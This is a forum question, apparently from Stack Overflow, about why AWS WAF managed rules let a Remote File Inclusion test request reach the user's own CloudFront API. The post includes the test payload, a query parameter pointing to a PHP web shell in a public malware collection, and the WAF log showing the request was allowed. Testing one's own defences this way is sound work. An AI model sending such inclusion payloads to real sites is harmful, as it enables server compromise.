# AWS WAF rule AWSManagedRulesCommonRuleSet does not seem to work properly

Tags: security, amazon-cloudfront, amazon-waf, remote-file-inclusion

I'm currently trying to setup a Cloudfront distribution with a web ACL (WAF). I enabled the AWS managed rule called `AWSManagedRulesCommonRuleSet` (documentation to this rule can be found here: https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html).

I'm testing a Remote File Inclusion, for which I would expect my query to be blocked by the WAF. Unfortunately, my request still goes through. My query is `GET https://api.{mywebsite}.com/?test=https%3A%2F%2Fraw.githubusercontent.com%2Fmarcocesarato%2FPHP-Malware-Collection%2Fmaster%2Fclassic%2Fsimattacker.php`, so a simple GET query to `https://api.{mywebsite}.com` with a query parameter `test=https://raw.githubusercontent.com/marcocesarato/PHP-Malware-Collection/master/classic/simattacker.php`

I enabled the log for the WAF, here you can see that my query is not block, despite the RFI present.

```
{
    "timestamp": 1697798175056,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:us-east-1:249461922481:global/webacl/waf-demo/ce82b689-0a46-4018-a992-80f6d03a1ca3",
    "terminatingRuleId": "Default_Action",
    "terminatingRuleType": "REGULAR",
    "action": "ALLOW",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "CF",
    "httpSourceId": "E2HC5UK2JK9WVG",
    "ruleGroupList": [
        {
            "ruleGroupId": "AWS#AWSManagedRulesPHPRuleSet",
            "terminatingRule": null,
            "nonTerminatingMatchingRules": [],
            "excludedRules": null,
            "customerConfig": null
        },
        {
            "ruleGroupId": "AWS#AWSManagedRulesLinuxRuleSet",
            "terminatingRule": null,
            "nonTerminatingMatchingRules": [],
            "excludedRules": null,
            "customerConfig": null
        },
        {
            "ruleGroupId": "AWS#AWSManagedRulesKnownBadInputsRuleSet",
            "terminatingRule": null,
            "nonTerminatingMatchingRules": [],
            "excludedRules": null,
            "customerConfig": null
        },
        {
            "ruleGroupId": "AWS#AWSManagedRulesCommonRuleSet",
            "terminatingRule": null,
            "nonTerminatingMatchingRules": [],
            "excludedRules": null,
            "customerConfig": null
        },
        {
            "ruleGroupId": "AWS#AWSManagedRulesUnixRuleSet",
            "terminatingRule": null,
            "nonTerminatingMatchingRules": [],
            "excludedRules": null,
            "customerConfig": null
        },
        {
            "ruleGroupId": "AWS#AWSManagedRulesSQLiRuleSet",
            "terminatingRule": null,
            "nonTerminatingMatchingRules": [],
            "excludedRules": null,
            "customerConfig": null
        }
    ],
    "rateBasedRuleList": [
        {
            "rateBasedRuleId": "arn:aws:wafv2:us-east-1:249461922481_MANAGED:global/ipset/ce82b689-0a46-4018-a992-80f6d03a1ca3_d03fd8aa-b178-4da6-9da3-1b3a6511b176_IPV4/d03fd8aa-b178-4da6-9da3-1b3a6511b176",
            "rateBasedRuleName": "limit",
            "limitKey": "IP",
            "maxRateAllowed": 100,
            "limitValue": "{redacted}"
        }
    ],
    "nonTerminatingMatchingRules": [],
    "requestHeadersInserted": null,
    "responseCodeSent": null,
    "httpRequest": {
        "clientIp": "213.49.129.107",
        "country": "BE",
        "headers": [
            {
                "name": "host",
                "value": "api.{mywebsite}.com"
            },
            {
                "name": "user-agent",
                "value": "insomnia/8.3.0"
            },
            {
                "name": "accept",
                "value": "*/*"
            },
            {
                "name": "content-length",
                "value": "0"
            }
        ],
        "uri": "/",
        "args": "test=https%3A%2F%2Fraw.githubusercontent.com%2Fmarcocesarato%2FPHP-Malware-Collection%2Fmaster%2Fclassic%2Fsimattacker.php",
        "httpVersion": "HTTP/2.0",
        "httpMethod": "GET",
        "requestId": "45Jf2TK56hWIioDaQJgDVDFVgUVmULWq2OqRMbhmPQjXQW8lFYMNrA=="
    },
    "ja3Fingerprint": "4ea056e63b7910cbf543f0c095064dfe"
}
```

Could you help me understand what happens ?
Thanks